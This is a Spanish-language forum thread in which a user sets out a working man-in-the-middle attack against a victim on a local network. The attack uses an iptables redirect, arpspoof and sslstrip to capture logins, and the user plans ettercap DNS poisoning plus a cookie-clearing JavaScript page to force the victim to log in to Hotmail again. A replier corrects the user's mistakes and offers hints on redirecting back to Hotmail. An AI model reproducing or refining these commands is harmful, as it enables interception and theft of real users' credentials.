¿como borrar cookies con codigo en java?

Iniciado por thedevilini, 27 Enero 2012, 07:12 AM

0 Miembros y 1 Visitante están viendo este tema.

thedevilini

Hola a todos, uso backtrack 5 y sslstrip para monitorizar las conexiones SSL de la siguiente manera:

Código:
Código (bash) [Seleccionar]
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
python sslstrip.py -l 8080


Después miro el archivo.log de sslstrip y listo ahí aparecen los usuarios y contraseñas, pero con un problema. Aparecen, si no tiene iniciada la sesión en la página. Si ya ha iniciado la sesión me aparecen caracteres raros de "id" (secuencia de números).

¿Como puedo obligarle a cerrar la sesión para que tenga que logearse de nuevo?

he leido que se hace redireccionando a la victima a una pagina con un script...

asi que encontre un codigo para borrar las cookies (asi se le cerrara la sesion a la victima)... el codigo es el siguiente:




<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
<script language="javascript" type="text/javascript">
if (document.cookie != "") {
if (confirm("Eliminar todas las Cookies?")) {
la_cookie = document.cookie.split("; ")
fecha_fin = new Date
fecha_fin.setDate(fecha_fin.getDate()-1)
for (i=0; i<la_cookie.length; i++) {
mi_cookie = la_cookie.split("=")[0]
document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
}
document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
}
}
</script>
</body>


pero no tengo ni idea con que extension guardarlo dentro de mi servidor apache... tampoco tengo idea si es un codigo en php, html o java  :S   ...    y despues de redireccionar a la pagina con el codigo que borra las cookies, ¿como puedo volver a redireccionar a la victima a la pagina de hotmail?  ... muchas gracias espero su orientacion...

#!drvy

Este código NO es java. Es javascript, Y HAY DIFERENCIA.

javascript, se ejecuta mediante un motor incrustado en el navegador. Por tanto, se aplica la seguridad del navegador.

Eso quiere decir, simplemente, que no podrás borrar las cookies de otra pagina (otro dominio), que no sea la tuya.
De este modo, si quieres borrar las cookies de hotmail.com, tu pagina tendrá que estar alojada en hotmail.com

El archivo, puede ser guardado en un documento .html

Saludos

thedevilini

Muchas gracias, es de gran ayuda la info, pero no será necesario
Que este alojado en hotmail puesto que realizare un envenenamiento
Dns con ettercap para rediréccionar a la víctima a la pág. Con
El código, ahora como hago para que desPues la página vuelva a
Rediréccionar a hotmail???  ...  Además quiero informar que
Me esta fallando algo  por que guardo este codigo en un servidor
Apache con la extensión HTML y no surte ningún efecto en las cookies
de la víctima... Que es lo q me esta fallando ??? Saludos

#!drvy

Deberías aprender algo de html y javascript antes de preguntar.. son cosas básicas que en 5 minutos entenderás..

Mira te doy 2 pistas.

1. Para redireccionar a hotmail, es tan fácil como poner en el meta la dirección de hotmail y no que vuelva hacia atrás.

2. Te has fijado en el código javascript ? Te has fijado en que pide confirmación ?


Saludos